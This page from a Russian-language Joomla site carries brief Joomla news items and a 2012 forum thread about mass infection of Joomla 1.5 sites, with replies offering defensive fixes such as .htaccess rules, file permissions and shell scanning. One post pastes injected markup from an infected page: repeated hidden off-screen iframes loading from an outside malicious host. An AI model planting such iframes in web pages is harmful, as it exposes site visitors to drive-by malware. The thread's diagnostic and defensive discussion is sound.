Новости Joomla

Вышли релизы безопасности Joomla 6.1.1 и Joomla 5.4.6

Релиз безопасности Joomla 6.1.1 и Joomla 5.4.6

Проект Joomla! рад сообщить о выходе Joomla 6.1.1 и Joomla 5.4.6. Это релизы безопасности и исправления ошибок для серий 5.x и 6.x.

👩‍💻 JoomShopping: Самый полный курс по созданию интернет-магазина на CMS Joomla.

👩‍💻 JoomShopping: Самый полный курс по созданию интернет-магазина на CMS Joomla.

В открытый доступ выложен видео-курс Дмитрия Гончарова по созданию интернет-магазина на связке Joomla + JoomShopping. Видеоуроки содержат пошаговые инструкции от регистрации хостинга до особенностей вёрстки, настройки способов оплаты и доставки.

В видео фигурирует JoomShopping 4 и Joomla 3, однако JoomShopping довольно консервативный компонент и многие способы и подходы в нём не менялись годами, поэтому данные видео могут быть по прежнему полезны.

Смотреть видео-курс

@joomlafeed

👩‍💻 SM WT CDEK аддон доставки для JoomShopping.

👩‍💻 SM WT CDEK аддон доставки для JoomShopping.

Способ доставки для интернет-магазина JoomShopping. Работает с API CDEK v.2. Считает стоимость доставки, позволяет выбрать пункт выдачи заказа CDEK на карте, отображает полную информацию о ПВЗ в заказе. Для работы аддона необходимо установить и настроить библиотеку WT CDEK.

👉 v.1.3.4. Что нового?
- Скидки на доставку. Добавлены настройки скидок на доставку в зависимости от суммы заказа. Также можно выбрать какую цену использовать: до применения купона или после.
- Фиксированная наценка. Добавлено поле для фиксированной наценки на доставку в интерфейс цены на доставку.
- Локализация. Сделаны файлы локализации. Русский и английский языки.
- Рефакторинг и чистка кода. Приблизили код к стандартам.

Страница расширения

@joomlafeed

1   Вниз
0 Пользователей и 1 Гость просматривают эту тему.
  • 10 Ответов
  • 2957 Просмотров
*

Stich SPb

  • Захожу иногда
  • 231
  • 5 / 0
Инфицирование сайтов на Joomla
« : 21.12.2012, 16:18:09 »
У меня на аккаунтах Timeweb находятся более 100 сайтов.
С 19 числа более 20 сайтов были заражены. В папку images/stories были внедрены какие то php файлы и картинки и с сайтов рассылался спам.
Браузеры на сайты ставят заглушку с предупреждением.
Служба поддержки просто бросает трубку даже не вникнув в суть вопроса.
Вопрос к тем кто в курсе. Какие новые вирусы могли появиться для Joomla 1.5.22 и 23 версий.
Как их автоматически удалять с сайтов - не на всех сайтах был бекап.
« Последнее редактирование: 21.12.2012, 18:00:48 от _ib_ »
Записан
*

SmiP

  • Захожу иногда
  • 265
  • 35 / 0
Re: Массовое инфицирование сайтов на Joomla
« Ответ #1 : 21.12.2012, 16:56:18 »
Посмотрите вот это
http://www.opennet.ru/opennews/art.shtml?num=35583
Записан
*

Град

  • Захожу иногда
  • 152
  • 67 / 0
  • В Багдаде все спокойно
Re: Массовое инфицирование сайтов на Joomla
« Ответ #2 : 21.12.2012, 17:32:25 »
Цитата: Stich SPb от 21.12.2012, 16:18:09
Какие новые вирусы могли появиться для Joomla 1.5.22 и 23 версий.


а может всетаки через компоненты ломают  ?   ;)


зы:  название темы уж больно страшное
Записан
СИЛЬНЫЙ ЕСТ ВКУСНОГО !
*

_ib_

  • Давно я тут
  • 673
  • 100 / 8
Re: Массовое инфицирование сайтов на Joomla
« Ответ #3 : 21.12.2012, 17:55:23 »
в папке images/stories/ , да и влюбой другой папке, откуда не должны запускаться PHP, создать .htaccess с содержанием:

<Files ~"\.php$">
Order allow,deny
Deny from all
Satisfy all
</Files>


Это не есть решение проблемы, это как профилактика от ботов, если есть дырочки. Но а так обновляйте Ваши расширения вовремя.
« Последнее редактирование: 21.12.2012, 18:00:21 от _ib_ »
Записан
Легальные шаблоны и дёшево!  + скидки до 50% для шаблонов клуба Joomlart, RocketTheme, Yootheme и Gavick.

при интересе пишите в личку или на мыло: "p" точка "d" собака gmx.de
*

Stich SPb

  • Захожу иногда
  • 231
  • 5 / 0
Re: Инфицирование сайтов на Joomla
« Ответ #4 : 21.12.2012, 18:10:12 »
А как можно запретить модификацию вирусами скриптов?
Записан
*

_ib_

  • Давно я тут
  • 673
  • 100 / 8
Re: Инфицирование сайтов на Joomla
« Ответ #5 : 21.12.2012, 18:25:20 »
в правах на файлы запретить всем запись, но тогда вы и не сможете обновляться. Перед обновлением можете менять права и после опять убирать чтение запись. На мой взгляд это муторно.
« Последнее редактирование: 21.12.2012, 18:37:26 от _ib_ »
Записан
Легальные шаблоны и дёшево!  + скидки до 50% для шаблонов клуба Joomlart, RocketTheme, Yootheme и Gavick.

при интересе пишите в личку или на мыло: "p" точка "d" собака gmx.de
*

wishlight

  • Гуру
  • 5086
  • 321 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Инфицирование сайтов на Joomla
« Ответ #6 : 21.12.2012, 18:31:44 »
Массовую смену прав может Admin Tools
Записан
*

Stich SPb

  • Захожу иногда
  • 231
  • 5 / 0
Re: Инфицирование сайтов на Joomla
« Ответ #7 : 21.12.2012, 21:25:47 »
Не могу найти файл который скрипты модифицирует.
Joomla залил поверх с релиза, компоненты и модули поудалял, шаблон переустановил, картинки вычистил.
Все равно вирус лезет((( Заражает все мгновенно. Как его вычислить? Вот такое безобразие вставляет:

Код
<iframe width="55" height="55" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http://qjklhgps.pcanywhere.net/77825a35a.rir?11"/>
<script type="text/javascript" src="/media/system/js/caption.js"/>
<iframe width="55" height="55" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http://qjklhgps.pcanywhere.net/77825a35a.rir?11"/>
<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css"/>
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css"/>
<link rel="stylesheet" type="text/css" href="/templates/volvo7/css/template.css" media="screen"/>
<!--[if IE 6]><link rel="stylesheet" href="/templates/volvo7/css/template.ie6.css" type="text/css" media="screen" /><![endif]-->
<!--[if IE 7]><link rel="stylesheet" href="/templates/volvo7/css/template.ie7.css" type="text/css" media="screen" /><![endif]-->
<script type="text/javascript" src="/templates/volvo7/jquery.js"/>
<iframe width="55" height="55" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http://qjklhgps.pcanywhere.net/77825a35a.rir?11"/>
<script type="text/javascript">jQuery.noConflict();</script>
<script type="text/javascript" src="/templates/volvo7/script.js"/>
<iframe width="55" height="55" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http://qjklhgps.pcanywhere.net/77825a35a.rir?11"/>

Записан
*

WebDisaster

  • Захожу иногда
  • 108
  • 12 / 0
Re: Инфицирование сайтов на Joomla
« Ответ #8 : 22.12.2012, 05:21:15 »
Цитата: Stich SPb от 21.12.2012, 21:25:47
Не могу найти файл который скрипты модифицирует.
Joomla залил поверх с релиза
Просто заливать "поверх" бессмысленно, т.к. шеллы, как правило, отдельные файлы, не входящие "в комплект" Joomla, и они остались на своём месте. Чтобы найти причину - читайте логи доступа.

Цитата: _ib_ от 21.12.2012, 18:25:20
можете менять права и после опять убирать чтение запись. На мой взгляд это муторно.
Если есть SSH, всё это решается быстро и просто. В примере рекурсивный обход директории /public_html с установкой прав "только чтение" для всех файлов php (синтаксис для BSD)
Код
find /home/xxx/public_html/ -type f -name "*.php" -exec chmod 444 {}
Другой вопрос, что и "защита" это - так себе. Скорее временная затычка на время устранения проблемы. Т.к. если злоумышленник получает права писать в директории, с большой вероятностью он сможет также легко поменять права.
« Последнее редактирование: 22.12.2012, 05:29:35 от WebDisaster »
Записан
*

wishlight

  • Гуру
  • 5086
  • 321 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Инфицирование сайтов на Joomla
« Ответ #9 : 22.12.2012, 11:25:09 »
ага... именно так. Я могу к примеру менять права
Записан
*

zikkuratvk

  • Глобальный модератор
  • 4824
  • 346 / 2
  • Обслуживаем проекты - дорого.
Re: Инфицирование сайтов на Joomla
« Ответ #10 : 22.12.2012, 11:58:28 »
Если я правильно понял, то проблема скорей всего в JCE старом там есть дыра через нее льют шелы. Если у вас есть шел на хосте, то изменение прав вам врядли поможет, он так же от имени PHP сменит права на папки скорей всего. Есть отличные утилиты, которые ищут залитые шелы... используйте их. Перед началом лечения, смени ftp разнесите сайты на разные аккаунты.
Записан
Хочется уникальное расширение? ===>>>> JoomLine - Разрабатываем расширения под заказ.
Использую хостинг TimeWeb и Reg
1   Вверх
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Как выявить вредоностный код на CMS Joomla?

Автор stud_pro

 Ответов: 1
Просмотров: 4059 		Последний ответ 23.04.2024, 10:06:10
от wishlight
Вирус редирект или взлом с редиректом Joomla 3.10

Автор Wany205

 Ответов: 1
Просмотров: 5092 		Последний ответ 25.05.2023, 08:49:57
от Театрал
Скрипты защиты Joomla 4

Автор mister_boy

 Ответов: 6
Просмотров: 4954 		Последний ответ 16.05.2023, 16:38:58
от mister_boy
Изолирование папок сайтов на OpenServer

Автор Lemady

 Ответов: 41
Просмотров: 10060 		Последний ответ 29.11.2021, 15:47:31
от KoreshS
Поставил Joomla 4. Хостинг nic.ru стал ругаться на ошибки безопасности

Автор Oleg+

 Ответов: 5
Просмотров: 3415 		Последний ответ 13.09.2021, 09:23:28
от Oleg+